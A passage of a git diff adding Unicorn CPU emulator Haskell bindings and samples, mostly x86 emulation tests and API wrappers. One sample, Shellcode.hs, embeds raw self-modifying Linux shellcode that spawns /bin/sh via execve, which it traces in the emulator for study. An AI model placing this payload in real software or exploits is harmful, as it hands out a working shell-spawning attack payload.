0x" ++ + showHex addr ++ ", data size = " ++ show size ++ + ", data value = 0x" ++ showHex value + memMap uc 0xaaaa0000 (2 * 1024 * 1024) [ProtAll] + return True +hookMemInvalid _ _ _ _ _ _ = + return False + +hookMem64 :: MemoryHook () +hookMem64 _ MemRead addr size _ _ = + putStrLn $ ">>> Memory is being READ at 0x" ++ showHex addr ++ + ", data size = " ++ show size +hookMem64 _ MemWrite addr size (Just value) _ = + putStrLn $ ">>> Memory is being WRITE at 0x" ++ showHex addr ++ + ", data size = " ++ show size ++ ", data value = 0x" ++ + showHex value + +-- Callback for IN instruction (X86) +-- This returns the data read from the port +hookIn :: InHook () +hookIn uc port size _ = do + result <- runEmulator $ do + eip <- regRead uc X86.Eip + + emuPutStrLn $ "--- reading from port 0x" ++ showHex port ++ + ", size: " ++ show size ++ ", address: 0x" ++ showHex eip + + 
case size of + -- Read 1 byte to AL + 1 -> return 0xf1 + -- Read 2 byte to AX + 2 -> return 0xf2 + -- Read 4 byte to EAX + 4 -> return 0xf4 + -- Should never reach this + _ -> return 0 + case result of + Right r -> return r + Left _ -> return 0 + +-- Callback for OUT instruction (X86) +hookOut :: OutHook () +hookOut uc port size value _ = do + runEmulator $ do + eip <- regRead uc X86.Eip + + emuPutStrLn $ "--- writing to port 0x" ++ showHex port ++ ", size: " ++ + show size ++ ", value: 0x" ++ showHex value ++ + ", address: 0x" ++ showHex eip + + -- Confirm that value is indeed the value of AL/AX/EAX + case size of + 1 -> do + tmp <- regRead uc X86.Al + emuPutStrLn $ "--- register value = 0x" ++ showHex tmp + 2 -> do + tmp <- regRead uc X86.Ax + emuPutStrLn $ "--- register value = 0x" ++ showHex tmp + 4 -> do + tmp <- regRead uc X86.Eax + emuPutStrLn $ "--- register value = 0x" ++ showHex tmp + -- Should never reach this + _ -> return () + return () + +-- Callback for SYSCALL instruction (X86) +hookSyscall :: SyscallHook () +hookSyscall uc _ = do + runEmulator $ do + rax <- regRead uc X86.Rax + if rax == 0x100 then + regWrite uc X86.Rax 0x200 + else + emuPutStrLn $ "ERROR: was not expecting rax=0x" ++ showHex rax ++ + " in syscall" + return () + +testI386 :: IO () +testI386 = do + putStrLn "Emulate i386 code" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32 + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instruction by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32 + start uc address (address + 
codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + + -- Read from memory + tmp <- memRead uc address 4 + emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex address ++ + "] = 0x" ++ showHexBS tmp + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testI386Jump :: IO () +testI386Jump = do + putStrLn "===================================" + putStrLn "Emulate i386 code with jump" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32Jump + + -- Tracing 1 basic block with customized callback + blockHookAdd uc hookBlock () address address + + -- Tracing 1 instruction at address + codeHookAdd uc hookCode () address address + + -- Emulate machine code ininfinite time + let codeLen = codeLength x86Code32Jump + start uc address (address + codeLen) Nothing Nothing + + emuPutStrLn ">>> Emulation done. 
Below is the CPU context" + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that loop forever +testI386Loop :: IO () +testI386Loop = do + putStrLn "===================================" + putStrLn "Emulate i386 code that loop forever" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated in memory + memWrite uc address x86Code32Loop + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Emulate machine code in 2 seconds, so we can quit even if the code + -- loops + let codeLen = codeLength x86Code32Loop + start uc address (address + codeLen) (Just $ 2 * 1000000) Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that read invalid memory +testI386InvalidMemRead :: IO () +testI386InvalidMemRead = do + putStrLn "===================================" + putStrLn "Emulate i386 code that read from invalid memory" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32MemRead + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic block with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions by having 
@beegin > @end + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32MemRead + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that write invalid memory +testI386InvalidMemWrite :: IO () +testI386InvalidMemWrite = do + putStrLn "===================================" + putStrLn "Emulate i386 code that write to invalid memory" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32MemWrite + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instruction by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Intercept invalid memory events + memoryEventHookAdd uc HookMemReadUnmapped hookMemInvalid () 1 0 + memoryEventHookAdd uc HookMemWriteUnmapped hookMemInvalid () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32MemWrite + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. 
Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + + -- Read from memory + tmp <- memRead uc 0xaaaaaaaa 4 + emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xaaaaaaaa ++ + "] = 0x" ++ showHexBS tmp + + tmp <- memRead uc 0xffffffaa 4 + emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xffffffaa ++ + "] = 0x" ++ showHexBS tmp + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that jump to invalid memory +testI386JumpInvalid :: IO () +testI386JumpInvalid = do + putStrLn "===================================" + putStrLn "Emulate i386 code that jumps to invalid memory" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32JmpInvalid + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32JmpInvalid + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. 
Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testI386InOut :: IO () +testI386InOut = do + putStrLn "===================================" + putStrLn "Emulate i386 code with IN/OUT instructions" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32InOut + + -- Initialize machine registers + regWrite uc X86.Eax 0x1234 + regWrite uc X86.Ecx 0x6789 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions + codeHookAdd uc hookCode () 1 0 + + -- uc IN instruction + inHookAdd uc hookIn () 1 0 + + -- uc OUT instruction + outHookAdd uc hookOut () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32InOut + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. 
Below is the CPU context" + + eax <- regRead uc X86.Eax + ecx <- regRead uc X86.Ecx + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code and save/restore the CPU context +testI386ContextSave :: IO () +testI386ContextSave = do + putStrLn "===================================" + putStrLn "Save/restore CPU context in opaque blob" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 8KB memory for this emulation + memMap uc address (8 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32Inc + + -- Initialize machine registers + regWrite uc X86.Eax 0x1 + + -- Emulate machine code in infinite time + emuPutStrLn ">>> Running emulation for the first time" + + let codeLen = codeLength x86Code32Inc + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + eax <- regRead uc X86.Eax + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + + -- Allocate and save the CPU context + emuPutStrLn ">>> Saving CPU context" + + context <- contextAllocate uc + contextSave uc context + + -- Emulate machine code again + emuPutStrLn ">>> Running emulation for the second time" + + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + eax <- regRead uc X86.Eax + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + + -- Restore CPU context + contextRestore uc context + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. 
Below is the CPU context" + + eax <- regRead uc X86.Eax + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testX8664 :: IO () +testX8664 = do + putStrLn "Emulate x86_64 code" + + result <- runEmulator $ do + -- Initialize emualator in X86-64bit mode + uc <- open ArchX86 [Mode64] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code64 + + -- Initialize machine registers + regWrite uc X86.Rsp (fromIntegral address + 0x200000) + + regWrite uc X86.Rax 0x71f3029efd49d41d + regWrite uc X86.Rbx 0xd87b45277f133ddb + regWrite uc X86.Rcx 0xab40d1ffd8afc461 + regWrite uc X86.Rdx 0x919317b4a733f01 + regWrite uc X86.Rsi 0x4c24e753a17ea358 + regWrite uc X86.Rdi 0xe509a57d2571ce96 + regWrite uc X86.R8 0xea5b108cc2b9ab1f + regWrite uc X86.R9 0x19ec097c8eb618c1 + regWrite uc X86.R10 0xec45774f00c5f682 + regWrite uc X86.R11 0xe17e9dbec8c074aa + regWrite uc X86.R12 0x80f86a8dc0f6d457 + regWrite uc X86.R13 0x48288ca5671c5492 + regWrite uc X86.R14 0x595f72f6e4017f6e + regWrite uc X86.R15 0x1efd97aea331cccc + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions in the range [address, address+20] + codeHookAdd uc hookCode64 () address (address + 20) + + -- Tracing all memory WRITE access (with @begin > @end) + memoryHookAdd uc HookMemWrite hookMem64 () 1 0 + + -- Tracing all memory READ access (with @begin > @end) + memoryHookAdd uc HookMemRead hookMem64 () 1 0 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength x86Code64 + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. 
Below is the CPU context" + + rax <- regRead uc X86.Rax + rbx <- regRead uc X86.Rbx + rcx <- regRead uc X86.Rcx + rdx <- regRead uc X86.Rdx + rsi <- regRead uc X86.Rsi + rdi <- regRead uc X86.Rdi + r8 <- regRead uc X86.R8 + r9 <- regRead uc X86.R9 + r10 <- regRead uc X86.R10 + r11 <- regRead uc X86.R11 + r12 <- regRead uc X86.R12 + r13 <- regRead uc X86.R13 + r14 <- regRead uc X86.R14 + r15 <- regRead uc X86.R15 + + emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax + emuPutStrLn $ ">>> RBX = 0x" ++ showHex rbx + emuPutStrLn $ ">>> RCX = 0x" ++ showHex rcx + emuPutStrLn $ ">>> RDX = 0x" ++ showHex rdx + emuPutStrLn $ ">>> RSI = 0x" ++ showHex rsi + emuPutStrLn $ ">>> RDI = 0x" ++ showHex rdi + emuPutStrLn $ ">>> R8 = 0x" ++ showHex r8 + emuPutStrLn $ ">>> R9 = 0x" ++ showHex r9 + emuPutStrLn $ ">>> R10 = 0x" ++ showHex r10 + emuPutStrLn $ ">>> R11 = 0x" ++ showHex r11 + emuPutStrLn $ ">>> R12 = 0x" ++ showHex r12 + emuPutStrLn $ ">>> R13 = 0x" ++ showHex r13 + emuPutStrLn $ ">>> R14 = 0x" ++ showHex r14 + emuPutStrLn $ ">>> R15 = 0x" ++ showHex r15 + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testX8664Syscall :: IO () +testX8664Syscall = do + putStrLn "===================================" + putStrLn "Emulate x86_64 code with 'syscall' instruction" + + result <- runEmulator $ do + -- Initialize emulator in X86-64bit mode + uc <- open ArchX86 [Mode64] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code64Syscall + + -- Hook interrupts for syscall + syscallHookAdd uc hookSyscall () 1 0 + + -- Initialize machine registers + regWrite uc X86.Rax 0x100 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all code + let codeLen = codeLength x86Code64Syscall + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers 
+ emuPutStrLn ">>> Emulation done. Below is the CPU context" + + rax <- regRead uc X86.Rax + emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testX8616 :: IO () +testX8616 = do + putStrLn "Emulate x86 16-bit code" + + result <- runEmulator $ do + -- Initialize emulator in X86-16bit mode + uc <- open ArchX86 [Mode16] + + -- Map 8KB memory for this emulation + memMap uc 0 (8 * 1024) [ProtAll] + + -- Write machine code to be emulated in memory + memWrite uc 0 x86Code16 + + -- Initialize machine registers + regWrite uc X86.Eax 7 + regWrite uc X86.Ebx 5 + regWrite uc X86.Esi 6 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength x86Code16 + start uc 0 codeLen Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + -- Read from memory + tmp <- memRead uc 11 1 + emuPutStrLn $ ">>> Read 1 bytes from [0x" ++ showHex 11 ++ + "] = 0x" ++ showHexBS tmp + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +main :: IO () +main = do + progName <- getProgName + args <- getArgs + case args of + ["-32"] -> do + testI386 + testI386InOut + testI386ContextSave + testI386Jump + testI386Loop + testI386InvalidMemRead + testI386InvalidMemWrite + testI386JumpInvalid + ["-64"] -> do + testX8664 + testX8664Syscall + ["-16"] -> testX8616 + -- Test memleak + ["-0"] -> testI386 + _ -> putStrLn $ "Syntax: " ++ progName ++ " <-16|-32|-64>" + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/Shellcode.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/Shellcode.hs new file mode 100644 index 0000000..65ad979 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/Shellcode.hs @@ -0,0 +1,153 @@ +-- 
Sample code to trace code with Linux code with syscall + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.X86 as X86 + +import Control.Monad.Trans.Class (lift) +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) +import System.Environment + +-- Code to be emulated +x86Code32 :: BS.ByteString +x86Code32 = BS.pack [0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, + 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, 0xcd, + 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, + 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, 0x6c, 0x6c, + 0x6f] + +x86Code32Self :: BS.ByteString +x86Code32Self = BS.pack [0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, + 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, 0x89, + 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, + 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, 0xff, 0x31, + 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, + 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, + 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41] + +-- Memory address where emulation starts +address :: Word64 +address = 0x1000000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Pretty-print byte string as hex +showHexBS :: BS.ByteString -> String +showHexBS = + concatMap (flip N.showHex " ") . BS.unpack + +-- Write a string (with a newline character) to standard output in the emulator +emuPutStrLn :: String -> Emulator () +emuPutStrLn = + lift . putStrLn + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . 
BS.length + +-- Callback for tracing instructions +hookCode :: CodeHook () +hookCode uc addr size _ = do + runEmulator $ do + emuPutStrLn $ "Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + + eip <- regRead uc X86.Eip + tmp <- memRead uc addr (maybe 0 id size) + + emuPutStrLn $ "*** EIP = " ++ showHex eip ++ " ***: " ++ showHexBS tmp + return () + +-- Callback for handling interrupts +-- ref: http://syscalls.kernelgrok.com +hookIntr :: InterruptHook () +hookIntr uc intno _ + | intno == 0x80 = do + runEmulator $ do + eax <- regRead uc X86.Eax + eip <- regRead uc X86.Eip + + case eax of + -- sys_exit + 1 -> do + emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", SYS_EXIT. quit!\n" + stop uc + -- sys_write + 4 -> do + -- ECX = buffer address + ecx <- regRead uc X86.Ecx + + -- EDX = buffer size + edx <- regRead uc X86.Edx + + -- Read the buffer in + buffer <- memRead uc (fromIntegral ecx) (fromIntegral edx) + err <- errno uc + if err == ErrOk then + emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", SYS_WRITE. buffer = 0x" ++ + showHex ecx ++ ", size = " ++ + show edx ++ ", content = " ++ + showHexBS buffer + else + emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", SYS_WRITE. 
buffer = 0x" ++ + showHex ecx ++ ", size = " ++ show edx ++ + " (cannot get content)" + _ -> emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", EAX = 0x" ++ showHex eax + return () + | otherwise = return () + +testI386 :: IO () +testI386 = do + result <- runEmulator $ do + emuPutStrLn "Emulate i386 code" + + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32Self + + -- Initialize machine registers + regWrite uc X86.Esp (fromIntegral address + 0x200000) + + -- Tracing all instructions by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Handle interrupt ourself + interruptHookAdd uc hookIntr () 1 0 + + emuPutStrLn "\n>>> Start tracing this Linux code" + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32Self + start uc address (address + codeLen) Nothing Nothing + case result of + Right _ -> putStrLn "\n>>> Emulation done." + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +main :: IO () +main = do + progName <- getProgName + args <- getArgs + case args of + ["-32"] -> testI386 + _ -> putStrLn $ "Syntax: " ++ progName ++ " <-32|-64>" diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn.hs new file mode 100644 index 0000000..7ea638e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn.hs @@ -0,0 +1,360 @@ +{-| +Module : Unicorn +Description : The Unicorn CPU emulator. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator +framework based on QEMU. + +Further information is available at . 
+-} +module Unicorn + ( -- * Emulator control + Emulator + , Engine + , Architecture(..) + , Mode(..) + , QueryType(..) + , runEmulator + , open + , query + , start + , stop + + -- * Register operations + , regWrite + , regRead + , regWriteBatch + , regReadBatch + + -- * Memory operations + , MemoryPermission(..) + , MemoryRegion(..) + , memWrite + , memRead + , memMap + , memUnmap + , memProtect + , memRegions + + -- * Context operations + , Context + , contextAllocate + , contextSave + , contextRestore + + -- * Error handling + , Error(..) + , errno + , strerror + + -- * Misc. + , version + ) where + +import Control.Monad (join, liftM) +import Control.Monad.Trans.Class (lift) +import Control.Monad.Trans.Except (throwE, runExceptT) +import Data.ByteString (ByteString, pack) +import Foreign +import Prelude hiding (until) + +import Unicorn.Internal.Core +import Unicorn.Internal.Unicorn + +------------------------------------------------------------------------------- +-- Emulator control +------------------------------------------------------------------------------- + +-- | Run the Unicorn emulator and return a result on success, or an 'Error' on +-- failure. +runEmulator :: Emulator a -- ^ The emulation code to execute + -> IO (Either Error a) -- ^ A result on success, or an 'Error' on + -- failure +runEmulator = + runExceptT + +-- | Create a new instance of the Unicorn engine. +open :: Architecture -- ^ CPU architecture + -> [Mode] -- ^ CPU hardware mode + -> Emulator Engine -- ^ A 'Unicorn' engine on success, or an 'Error' on + -- failure +open arch mode = do + (err, ucPtr) <- lift $ ucOpen arch mode + if err == ErrOk then + -- Return a pointer to the Unicorn engine if ucOpen completed + -- successfully + lift $ mkEngine ucPtr + else + -- Otherwise return the error + throwE err + +-- | Query internal status of the Unicorn engine. 
+query :: Engine -- ^ 'Unicorn' engine handle + -> QueryType -- ^ Query type + -> Emulator Int -- ^ The result of the query +query uc queryType = do + (err, result) <- lift $ ucQuery uc queryType + if err == ErrOk then + pure result + else + throwE err + +-- | Emulate machine code for a specific duration of time. +start :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Address where emulation starts + -> Word64 -- ^ Address where emulation stops (i.e. when this + -- address is hit) + -> Maybe Int -- ^ Optional duration to emulate code (in + -- microseconds). + -- If 'Nothing' is provided, continue to emulate + -- until the code is finished + -> Maybe Int -- ^ Optional number of instructions to emulate. If + -- 'Nothing' is provided, emulate all the code + -- available, until the code is finished + -> Emulator () -- ^ An 'Error' on failure +start uc begin until timeout count = do + err <- lift $ ucEmuStart uc begin until (maybeZ timeout) (maybeZ count) + if err == ErrOk then + pure () + else + throwE err + where maybeZ = maybe 0 id + +-- | Stop emulation (which was started by 'start'). +-- This is typically called from callback functions registered by tracing APIs. +-- +-- NOTE: For now, this will stop execution only after the current block. +stop :: Engine -- ^ 'Unicorn' engine handle + -> Emulator () -- ^ An 'Error' on failure +stop uc = do + err <- lift $ ucEmuStop uc + if err == ErrOk then + pure () + else + throwE err + +------------------------------------------------------------------------------- +-- Register operations +------------------------------------------------------------------------------- + +-- | Write to register. +regWrite :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> r -- ^ Register to write to + -> Int64 -- ^ Value to write to register + -> Emulator () -- ^ An 'Error' on failure +regWrite uc reg value = do + err <- lift $ ucRegWrite uc reg value + if err == ErrOk then + pure () + else + throwE err + +-- | Read register value. 
+regRead :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> r -- ^ Register to read from + -> Emulator Int64 -- ^ The value read from the register on success, + -- or an 'Error' on failure +regRead uc reg = do + (err, val) <- lift $ ucRegRead uc reg + if err == ErrOk then + pure val + else + throwE err + +-- | Write multiple register values. +regWriteBatch :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> [r] -- ^ List of registers to write to + -> [Int64] -- ^ List of values to write to the registers + -> Emulator () -- ^ An 'Error' on failure +regWriteBatch uc regs vals = do + err <- lift $ ucRegWriteBatch uc regs vals (length regs) + if err == ErrOk then + pure () + else + throwE err + +-- | Read multiple register values. +regReadBatch :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> [r] -- ^ List of registers to read from + -> Emulator [Int64] -- ^ A list of register values on success, + -- or an 'Error' on failure +regReadBatch uc regs = do + -- Allocate an array of the given size + let size = length regs + join . lift . allocaArray size $ \array -> do + err <- ucRegReadBatch uc regs array size + if err == ErrOk then + -- If ucRegReadBatch completed successfully, pack the contents of + -- the array into a list and return it + liftM pure (peekArray size array) + else + -- Otherwise return the error + return $ throwE err + +------------------------------------------------------------------------------- +-- Memory operations +------------------------------------------------------------------------------- + +-- | Write to memory. +memWrite :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Starting memory address of bytes to write + -> ByteString -- ^ The data to write + -> Emulator () -- ^ An 'Error' on failure +memWrite uc address bytes = do + err <- lift $ ucMemWrite uc address bytes + if err == ErrOk then + pure () + else + throwE err + +-- | Read memory contents. 
+memRead :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Starting memory address to read + -- from + -> Int -- ^ Size of memory to read (in bytes) + -> Emulator ByteString -- ^ The memory contents on success, or + -- an 'Error' on failure +memRead uc address size = do + -- Allocate an array of the given size + join . lift . allocaArray size $ \array -> do + err <- ucMemRead uc address array size + if err == ErrOk then + -- If ucMemRead completed successfully, pack the contents of the + -- array into a ByteString and return it + liftM (pure . pack) (peekArray size array) + else + -- Otherwise return the error + return $ throwE err + +-- | Map a range of memory. +memMap :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Start address of the new memory region to + -- be mapped in. This address must be + -- aligned to 4KB, or this will return with + -- 'ErrArg' error + -> Int -- ^ Size of the new memory region to be mapped + -- in. This size must be a multiple of 4KB, or + -- this will return with an 'ErrArg' error + -> [MemoryPermission] -- ^ Permissions for the newly mapped region + -> Emulator () -- ^ An 'Error' on failure +memMap uc address size perms = do + err <- lift $ ucMemMap uc address size perms + if err == ErrOk then + pure () + else + throwE err + +-- | Unmap a range of memory. +memUnmap :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Start addres of the memory region to be unmapped. + -- This address must be aligned to 4KB or this will + -- return with an 'ErrArg' error + -> Int -- ^ Size of the memory region to be modified. This + -- must be a multiple of 4KB, or this will return with + -- an 'ErrArg' error + -> Emulator () -- ^ An 'Error' on failure +memUnmap uc address size = do + err <- lift $ ucMemUnmap uc address size + if err == ErrOk then + pure () + else + throwE err + +-- | Change permissions on a range of memory. 
